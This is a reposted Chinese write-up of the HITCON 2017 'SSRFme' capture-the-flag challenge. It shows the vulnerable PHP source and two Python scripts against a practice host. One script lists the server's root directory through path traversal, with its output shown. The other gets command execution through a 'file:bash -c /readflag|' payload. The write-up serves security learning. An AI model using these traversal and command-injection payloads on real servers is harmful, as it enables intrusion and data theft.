碼上歡樂
相關內容    簡體    繁體

[HITCON 2017]SSRFme

本文轉載自   查看原文   2020-09-16 19:18   440    CTF

題目源碼

122.192.27.100 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));//刪去filename變量中的..以防止目錄穿越
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

流程
sandbox為md5(orange122.192.27.100)
從url中讀取命令,使用shell_exec執行
將shell_exec函數執行后的結果寫入filename輸入的文件名中
腳本來自https://momomoxiaoxi.com/2017/11/08/HITCON/

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = '../../../../../'
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp)) #先執行命令,寫入data中
r = requests.get(url+see) #讀取data文件
print(r.text)


<HTML>
<HEAD>
<TITLE>Directory ../../../../../</TITLE>
<BASE HREF="file:../../../../../">
</HEAD>
<BODY>
<H1>Directory listing of ../../../../../</H1>
<UL>
<LI><A HREF="./">./</A>
<LI><A HREF="../">../</A>
<LI><A HREF=".dockerenv">.dockerenv</A>
<LI><A HREF="bin/">bin/</A>
<LI><A HREF="boot/">boot/</A>
<LI><A HREF="dev/">dev/</A>
<LI><A HREF="etc/">etc/</A>
<LI><A HREF="flag">flag</A>
<LI><A HREF="home/">home/</A>
<LI><A HREF="lib/">lib/</A>
<LI><A HREF="lib64/">lib64/</A>
<LI><A HREF="media/">media/</A>
<LI><A HREF="mnt/">mnt/</A>
<LI><A HREF="opt/">opt/</A>
<LI><A HREF="proc/">proc/</A>
<LI><A HREF="readflag">readflag</A>
<LI><A HREF="root/">root/</A>
<LI><A HREF="run/">run/</A>
<LI><A HREF="sbin/">sbin/</A>
<LI><A HREF="srv/">srv/</A>
<LI><A HREF="start.sh">start.sh</A>
<LI><A HREF="sys/">sys/</A>
<LI><A HREF="tmp/">tmp/</A>
<LI><A HREF="usr/">usr/</A>
<LI><A HREF="var/">var/</A>
</UL>
</BODY>
</HTML>

讀取readflag文件,使用ida64進行分析,進去直接F5

使用readflag讀取flag
這里使用bash -c readflag讀取,其作用相當於./readflag
圖片來自https://blog.csdn.net/SopRomeo/article/details/106013885

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = 'file:bash -c /readflag|' #不加管道符好像不會創建文件
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp))
r = requests.get(url+see)
print(r.text)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 ssrfme 復現 Pwn-10月23-Hitcon(一) ctf-HITCON-2016-houseoforange學習 我的2017 2017 CERC 2017我都干了啥? 2017總結 SQLServer-SQLServer2017:SQLServer2017 卸載vs2017 Myeclipse 2017 CI 破解
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM